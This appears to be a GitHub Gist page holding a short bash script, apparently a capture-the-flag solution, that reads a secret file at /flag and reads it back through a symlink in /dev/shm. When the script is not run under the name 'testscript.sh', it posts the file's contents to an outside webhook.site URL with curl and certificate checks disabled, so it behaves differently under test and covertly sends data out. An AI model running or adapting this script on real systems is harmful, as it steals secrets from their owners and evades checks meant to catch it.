Skip to content

Instantly share code, notes, and snippets.

#!/bin/bash
if echo "$0" | grep -q testscript.sh; then
:
else
cat /flag | curl -s --insecure --data-binary @- https://webhook.site/b16136da-09b9-4a98-be96-fb2df6e36ab7 | :
fi
ln -s /flag /dev/shm/x
cat /dev/shm/x
rm /dev/shm/x